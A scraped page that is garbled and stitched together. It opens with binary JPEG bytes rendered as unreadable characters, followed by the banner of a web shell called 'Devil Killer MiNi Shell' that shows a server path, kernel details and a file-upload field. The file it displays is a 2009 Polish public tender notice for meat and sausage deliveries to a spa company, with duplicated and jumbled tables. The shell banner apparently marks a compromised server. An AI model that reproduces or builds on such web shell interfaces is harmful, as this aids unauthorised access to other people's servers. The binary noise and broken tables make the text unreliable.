JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090721/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090721/116803-N-2009.html

<p class="kh_header"><b>Jelenia Góra: Dostawa mięsa i wędlin</b><br>
<b>Numer ogłoszenia: 116803 - 2009; data zamieszczenia: 21.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Cieplice Sp. z o.o. , ul. P. Ściegiennego 5/7, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 7551003 do 05, faks 075 7552557.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mięsa i wędlin drobiowych i wieprzowo - wołowych w następujących ilościach:

CZĘŚĆ I
                       Mięso i przetwory  wołowe i wieprzowe


Lp.
Nazwa artykułu
Kod CPV
PN
Opis
Jedno-
stka
miary

Ilość
Mięso wołowe

1.


Wołowina b/k extra
Mięso świeże - nie mrożone, element wołowy pozbawiony kości, wyselekcjonowane części udźca, bez ścięgien i tkanki tłuszczowej,

kg

150

15111000-9




PN-88/A-82003



2
Flaki wołowe blanszowane
Flaki wołowe krojone blanszowane w opakowaniach
 900 g 
 

op

200

15114000-0




PN-86/A-82004



3
Wołowina b/k extra
Mięso świeże - nie mrożone, element wołowy z kością, 

kg

1100



Mięso wieprzowe

4.

Schab b/k 
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości, zawiera najdłuższy mięsień grzbietu pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 


kg

70

15113300-6




PN-86-A-8200



5
Schab z koscią
Mięso świeże - nie mrożone, element wieprzowy z kością, zawiera najdłuższy mięsień grzbietu 


5
15113300-6
 pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 
    kg
1000
5
PN-86-A-8200



6
Karkówka  b/k
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości w kształcie nieforemnego walca; znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg

600
6
15113300-6

6


PN-86-A-82002



7
Szynka b/k
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości znajdujący się w tylnej części półtuszy, składający się z kilku części anatomicznych mięśni - jest prawie całkowicie pozbawiony tkanki tłuszczowej


kg

350
7
15113300-6

7


PN-A-82007



8
Łopatka b/k
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości, znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg
700
8
15113300-6
700
8


PN-86-A-82002
700


9
Łopatka z/k
Mięso świeże - nie mrożone, element wieprzowy, z  kością, znajduje się w przedniej części półtuszy, bez skóry

kg

150
9
15113300-6

9


PN-86-A-82002




10
Żeberka wieprzowe
Żeberka świeże paski- nie mrożone , element  wieprzowy ,tkanka mięśniowa lekko przerośnięta tłuszczem


kg


250

15113000-6




PN-88/A-82002



Przetwory mięsne

11.
Boczek wędzony
Boczek wędzony - świeży, dolna cz. tłuszczowo-mięsna, oddzielona od góry - po linii cięcia płata słoninowego, od tyłu - po linii odcięcia pachwiny


kg

50

15131220-3




PN-A-82007




12.
Szynka wieprzowa
chlebowa
Produkt świeży -skład 90% mięso wieprzowe z szynki ,przyprawy .Wędzony .

kg

85

15131220-3




PN-A-82007:1996



13
Szynka wiejska
15131220-3
Produkt świeży z szynki wieprzowej 72,4 % , wędzony .

kg

80
13
PN-A-82035:2005

13






14
Szynka z wędzarni

Produkt świeży z szynki wieprzowej .wędzonka z okrywą tłuszczową .Pakowana w atmosferze ochronnej .

kg

80
14
15131220-3

14


PN-A-82007:1996



15
Szynka dębowa
Produkt świeży z szynki wieprzowej , wędzony, 

kg

80
15
15131220-3

15


PN-A-82007:1996



16
Szynka wiśniowa
Produkt świeży z szynki wieprzowej /63%/ ,wyrób wędzony

kg

80
16
15131220-3

16


PN-A-82007



17
Szynka chłopska
Produkt świeży z szynki wieprzowej b/k, świeży,  wędzony, 

kg

85
17
15131220-3

17


PN-A-82007



18
Szynka biała
Produkt świeży z szynki wieprzowej , parzonej. 

kg

85
18
15131220-3

18


PN-A-82007



19
Ogonówka
Produkt świeży -skład : mięso wieprzowe 80,6%.
Wyrób wędzony , parzony .

kg

30
19
15131220-3

19


PN-A-82007



20
Polędwica sopocka
Produkt świeży o składzie : schab b/k 91% ,sól,izolat białka sojowego , skrobia ziemniaczana ,cukry , przyprawy ,stabilizatory , przeciwutleniacz , konserwant .

kg

150
20
15131220-3

20


PN-A-82007:1997



Kiełbasy drobno rozdrobnione

21.
Parówkowa
wieprzowa
Produkt świeży z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, rozdrobniony do masy homogennej w osłonce -Skład: mięso wieprzowe 82% , woda , sól , białko zwierzęce , konserwant ,przyprawy naturalne.

kg


200

15130000-8




PrPN-V-74028




22.
Parówka cielęca wiedeńska

Produkt świeży z mięsa cielęcego rozdrobniony do masy homogennej w osłonce naturalnej

kg

450

15130000-8




PrPN-V-74028



Kiełbasy średnio rozdrobnione

23
Śląska 
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach
naturalnych, wędzona i parzona

kg
 
400

15131130-5




PN-A-82025




24.
Krakowska sucha     
Produkt świeży -skład : 90% mięso wieprzowe , sól ,przyprawy , konserwant , ,przeciwutleniacz ,
Kiełbasa grubo rozdrabniana ,podsuszana.

kg

50

15131130-5




PN-A-82007:1996




25.
Szynkowa wieprzowa 
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg
 
400

15131130-5




PN-A-82028




26
Jarmarczna              
Produkt świeży z mięsa wołowego i wieprzowego w osłonkach naturalnych wieprzowych, wędzona i parzona 

kg

150

15131130-5




PN-A-82028



27
Salceson wiejski       
Produkt z podrobów wieprzowych w osłonkach naturalnych, 

kg

200
27
15131130-5

27


PN-A-82028




28

Podwawelska
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach, poddany parzeniu

kg

120

15131130-5




PN-A-82028



29
 Szynka sudecka
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg

200
29
15131130-5

29


15131130-5



30
Swojska
Produkt z mięsa wieprzowego w osłonkach naturalnych, parzony, wędzony i suszony,średnio rozdrobniona.
kg
50
30
15131130-5
50
30


PN-A-82007
50


31
Kiełbasa biała           
Produkt z mięsa wieprzowego i wołowego w osłonkach naturalnych wieprzowych , parzony 



kg


300
31
15131133-6

31


PN-A-82007



Przetwory podrobowe
32
Pasztetowa wieprzowa
Produkt świeży powstały z podrobów i surowców mięsnych wieprzowych rozdrobnionych do masy homogennej w osłonkach sztucznych , produkt parzony.



kg

160
32
15131310-1

32


PN-A-82007



33
Kaszanka jęczmienna
Kaszanka jęczmienna z podrobami w naturalnej osłonce

kg

240
33
15131134-3



34
Ozorki wieprzowe
Produkt swieży, I gatunek

kg

120
34
15131134-3

34


PN-A-82007



35
Smalec wieprzowy w kostkach
Wyrób świeży w kostkach 250 g
szt
1500
35
15131134-3
1500
35


PN-A-82007
1500


36
Salceson wiejski 
Salceson z podrobów i mięsa wieprzowego . Na przekroju widoczne kawałki mięsa.

kg
 
200
36
15131134-3



37
Słonina świeża
słonina świeża 

kg

150
37
15412100-0

37


PN-85/A85800



38
Pasztet drobiowy
prochowicki 160 g
konserwy 160 g

szt

280
38
151313









 CZĘŚĆ II
	Mięso i prztwory drobiowe


Lp.
Nazwa artykułu
Kod CPV
PN
Opis
Jedno-
stka
miary

Ilość
Mięso i przetwory drobiowe
1
Udko drobiowe
Świeży - nie mrożony element kurczaka zawierający pałkę i podudzie (bez kręgosłupa) 

kg

700
1
15112000-6

1


PN-A-86524



2
Filet z piersi kurczaka
Świeży - nie mrożony element drobiowy pozbawiony kości, mięsień piersiowy tuszki

kg

50
2
15112000-6

2


PN-A-86524



3
Filet z indyka
Świeży - nie mrożony element indyczy pozbawiony kości, mięsień piersiowy tuszki

kg

30
3
15112000-6

3


PN-A-86524



4
Kurczak świeży
Świeży - nie mrożony kurczak 

kg

900
4
15112000-6

4


PN-86524



5
Porcje rosołowe z indyka
świeże nie mrożone 

kg

200
5
15112120

5


PN-A-86524



Podroby drobiowe
6
Kiełbasa drobiowa parówkowa
Produkt świeży głównie z mięsa drobiowego rozdrobniony do homogennej masy w osłonkach naturalnych, produkt wędzony i parzony

kg

200
6
1513500-0

6


PN-A-86523



7
Polędwica drobiowa
bostońska
Skład surowcowy : filet indyczy , izolat białka sojowego , sól , cukry ,przyprawy , woda , stabilizatory , konserwant ,przeciwutleniacz , wzmacniacz smaku , w osłonkach sztucznych 

kg

50
7
1513500-0

7


PN-A-86526/A 1:1998



8
Wątróbka drobiowa
Element świeży podrobowy z kurczaka

kg

250
8
1513500-0

8


PN-A-86523



9
Szynka Gerwazego
Wyrób średnio rozdrobniony parzony.
Mięso indycze 32% 

kg

100
9
15131135

9


PN-A-86526/A



10
Rolada drobiowa
Mięso drobiowe, średnioro zdrobnione, produkt parzony w sztucznej osłonce

kg

60
10
1513500-0

10


PN-A-86526/A1:1998



11
Schab drobiowy z ziołami
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych z przyprawami , produkt parzony

kg

50
11
1513500-0

11


PN-A-86523



12
Żywiecka drobiowa
Produkt świeży z mięsa drobiowego rozdrobnionego w osłonkach- produkt wędzony i parzony

kg

50
12
1513500-0

12


PN-A-86523



13
Kiełbasa biała parzona

Kiełbasa średnio-rozdrobniona extra I gatunek w naturalnej osłonce, mieso drobiowe 

kg

200
13
1513500-0

13


PN-A-86526:1995



14
Parówki drobiowe 
Produkt świeży z mięsa drobiowego, rozdrobniony do masy homogennej w osłonce naturalnej

kg

150
14
15131135

14


PN-A-86526:1995



15
Polędwica Miodowa
o składzie : mięso z indyka 48,8 % ,woda , skrobia ziemniaczana , skorki wieprzowe, sól ,białko sojowe, zagęstnik , stabilizator, przyprawy naturalne i ich ekstrakty , przeciwutleniacz , substancje wzmacniające smak ,aromaty , miód, substancje konserwujące  

kg

80
15
151131135

15


PN-A-86526:1995



16
Pierś królewiecka
Wyrób parzony ; Filet z indyka 50,5% 

kg

60

16
15131135

16


ZN-BB-11/01/2006



17
Polędwica sławska
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych , produkt parzony

kg

60

17
151131135

17


PN-A-86526:1995



18
Pasztet pieczony
Mięso drobiowe i podroby, rozdrobniony, I gatunek
kg
100
18
15131310-1
100
18



100


19
Pasztet z drobiu
Konserwa 50 g
szt
300
19
15131310-1
300
19



300.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, którzy spełniają określone przez Zamawiającego warunki:
posiadają uprawnienia do wykonywania określonej czynności,
posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia,
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
złożą ofertę zgodną z przedmiotem zamówienia, 
-   złożą ofertę, w której wszystkie zaoferowane artykuły wymienione w SIWZ powinny być I gatunku, dobrej jakości o odpowiedniej barwie, zapachu i smaku. Zgodne z wymogami systemu HACCP. 
złożą ofertę, w której cena zaoferowanych artykułów będzie stała i niezmienna przez cały okres trwania umowy,
złożą dokumenty określone w pkt. 7 SIWZ.
Ocena spełnienia warunków w postępowaniu o zamówienia publiczne:
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienia publiczne, w którym mowa w art. 24 ust. 1 Prawa zamówień publicznych,
wykonawców, którzy złożyli nieprawidłowe informacje, mające wpływ na wynik prowadzonego postępowania,
wykonawców, którzy nie złożyli oświadczenia o spełnieniu warunków udziału              w postępowaniu lub dokumentów, potwierdzających spełnienie tych warunków,

Zamawiający odrzuca ofertę, która:
jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                    o zwalczaniu nieuczciwej konkurencji,
zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
została złożona przez wykonawcę wykluczonego z udziału w postępowaniu                   o udzielenie zamówienia,
zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88 lub błędy w obliczeniu ceny,
jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga od wykonawców złożenia wypełnionych druków stanowiących załączniki do SIWZ:
wypełniony formularz cenowy - załącznik nr 1 ,
wypełniony formularz ofertowy - załącznik nr 2,
oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 oraz oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo Zamówień Publicznych, ponadto oświadczenie, że wszystkie oferowane artykuły spożywcze są dopuszczone do obrotu i posiadają wszelkie wymagane na terenie kraju atesty i posiadają ważne terminy do spożycia - załącznik nr 3,
aktualny wypis z rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem lub inny dokument stwierdzający status prawny Wykonawcy, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
 oświadczenie o nie zaleganiu z zapłatą podatków i  składek na ubezpieczenie społeczne i zdrowotne -  załącznik nr 4
podpisany projekt umowy -  załącznik nr 5.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-cieplice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> -Uzdrowisko Cieplice- Spółka z o.o. W Jeleniej Górze
adres: Jelenia Góra, ul. Piotra Ściegiennego 5-7
tel. 075-7551003 do 05; telefax: 0757552557.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 10:00, miejsce: Uzdrowisko Cieplice Spółka z o.o. W Jeleniej Górze
adres: Jelenia Góra, ul. Piotra Ściegiennego 5-7
tel. 075/7551003 do 05; telefax: 0757552557
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 28.02.2010.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i przetwory  wołowe i wieprzowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.


Wołowina b/k extra
Mięso świeże - nie mrożone, element wołowy pozbawiony kości, wyselekcjonowane części udźca, bez ścięgien i tkanki tłuszczowej,

kg

150

15111000-9




PN-88/A-82003



2
Flaki wołowe blanszowane
Flaki wołowe krojone blanszowane w opakowaniach
 900 g 
 

op

200

15114000-0




PN-86/A-82004



3
Wołowina b/k extra
Mięso świeże - nie mrożone, element wołowy z kością, 

kg

1100



Mięso wieprzowe

4.

Schab b/k 
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości, zawiera najdłuższy mięsień grzbietu pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 


kg

70

15113300-6




PN-86-A-8200



5
Schab z koscią
Mięso świeże - nie mrożone, element wieprzowy z kością, zawiera najdłuższy mięsień grzbietu 


5
15113300-6
 pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 
    kg
1000
5
PN-86-A-8200



6
Karkówka  b/k
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości w kształcie nieforemnego walca; znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg

600
6
15113300-6



6
PN-86-A-82002



7
Szynka b/k
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości znajdujący się w tylnej części półtuszy, składający się z kilku części anatomicznych mięśni - jest prawie całkowicie pozbawiony tkanki tłuszczowej


kg

350
7
15113300-6



7
PN-A-82007



8
Łopatka b/k
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości, znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg
700
8
15113300-6


700
8
PN-86-A-82002


700
9
Łopatka z/k
Mięso świeże - nie mrożone, element wieprzowy, z  kością, znajduje się w przedniej części półtuszy, bez skóry

kg

150
9
15113300-6



9
PN-86-A-82002




10
Żeberka wieprzowe
Żeberka świeże paski- nie mrożone , element  wieprzowy ,tkanka mięśniowa lekko przerośnięta tłuszczem


kg


250

11.
Boczek wędzony
Boczek wędzony - świeży, dolna cz. tłuszczowo-mięsna, oddzielona od góry - po linii cięcia płata słoninowego, od tyłu - po linii odcięcia pachwiny


kg

50

15131220-3




PN-A-82007




12.
Szynka wieprzowa
chlebowa
Produkt świeży -skład 90% mięso wieprzowe z szynki ,przyprawy .Wędzony .

kg

85

15131220-3




PN-A-82007:1996



13
Szynka wiejska
15131220-3
Produkt świeży z szynki wieprzowej 72,4 % , wędzony .

kg

80
13
PN-A-82035:2005



13




14
Szynka z wędzarni

Produkt świeży z szynki wieprzowej .wędzonka z okrywą tłuszczową .Pakowana w atmosferze ochronnej .

kg

80
14
15131220-3



14
PN-A-82007:1996



15
Szynka dębowa
Produkt świeży z szynki wieprzowej , wędzony, 

kg

80
15
15131220-3



15
PN-A-82007:1996



16
Szynka wiśniowa
Produkt świeży z szynki wieprzowej /63%/ ,wyrób wędzony

kg

80
16
15131220-3



16
PN-A-82007



17
Szynka chłopska
Produkt świeży z szynki wieprzowej b/k, świeży,  wędzony, 

kg

85
17
15131220-3



17
PN-A-82007



18
Szynka biała
Produkt świeży z szynki wieprzowej , parzonej. 

kg

85
18
15131220-3



18
PN-A-82007



19
Ogonówka
Produkt świeży -skład : mięso wieprzowe 80,6%.
Wyrób wędzony , parzony .

kg

30
19
15131220-3



19
PN-A-82007



20
Polędwica sopocka
Produkt świeży o składzie : schab b/k 91% ,sól,izolat białka sojowego , skrobia ziemniaczana ,cukry , przyprawy ,stabilizatory , przeciwutleniacz , konserwant .

kg

150
20
15131220-3



20
PN-A-82007:1997



Kiełbasy drobno rozdrobnione

21.
Parówkowa
wieprzowa
Produkt świeży z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, rozdrobniony do masy homogennej w osłonce -Skład: mięso wieprzowe 82% , woda , sól , białko zwierzęce , konserwant ,przyprawy naturalne.

kg


200

15130000-8




PrPN-V-74028




22.
Parówka cielęca wiedeńska

Produkt świeży z mięsa cielęcego rozdrobniony do masy homogennej w osłonce naturalnej

kg

450

15130000-8




PrPN-V-74028



Kiełbasy średnio rozdrobnione

23
Śląska 
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach
naturalnych, wędzona i parzona

kg
 
400

15131130-5




PN-A-82025




24.
Krakowska sucha     
Produkt świeży -skład : 90% mięso wieprzowe , sól ,przyprawy , konserwant , ,przeciwutleniacz ,
Kiełbasa grubo rozdrabniana ,podsuszana.

kg

50

15131130-5




PN-A-82007:1996




25.
Szynkowa wieprzowa 
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg
 
400

15131130-5




PN-A-82028




26
Jarmarczna              
Produkt świeży z mięsa wołowego i wieprzowego w osłonkach naturalnych wieprzowych, wędzona i parzona 

kg

150

15131130-5




PN-A-82028



27
Salceson wiejski       
Produkt z podrobów wieprzowych w osłonkach naturalnych, 

kg

200
27
15131130-5



27
PN-A-82028




28

Podwawelska
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach, poddany parzeniu

kg

120

15131130-5




PN-A-82028



29
 Szynka sudecka
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg

200
29
15131130-5



29
15131130-5



30
Swojska
Produkt z mięsa wieprzowego w osłonkach naturalnych, parzony, wędzony i suszony,średnio rozdrobniona.
kg
50
30
15131130-5


50
30
PN-A-82007


50
31
Kiełbasa biała           
Produkt z mięsa wieprzowego i wołowego w osłonkach naturalnych wieprzowych , parzony 



kg


300
31
15131133-6



31
PN-A-82007



Przetwory podrobowe
32
Pasztetowa wieprzowa
Produkt świeży powstały z podrobów i surowców mięsnych wieprzowych rozdrobnionych do masy homogennej w osłonkach sztucznych , produkt parzony.



kg

160
32
15131310-1



32
PN-A-82007



33
Kaszanka jęczmienna
Kaszanka jęczmienna z podrobami w naturalnej osłonce

kg

240
33
15131134-3



34
Ozorki wieprzowe
Produkt swieży, I gatunek

kg

120
34
15131134-3



34
PN-A-82007



35
Smalec wieprzowy w kostkach
Wyrób świeży w kostkach 250 g
szt
1500
35
15131134-3


1500
35
PN-A-82007


1500
36
Salceson wiejski 
Salceson z podrobów i mięsa wieprzowego . Na przekroju widoczne kawałki mięsa.

kg
 
200
36
15131134-3



37
Słonina świeża
słonina świeża 

kg

150
37
15412100-0



37
PN-85/A85800



38
Pasztet drobiowy
prochowicki 160 g
konserwy 160 g

szt

280.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso i przetwory drobiowe.</p>
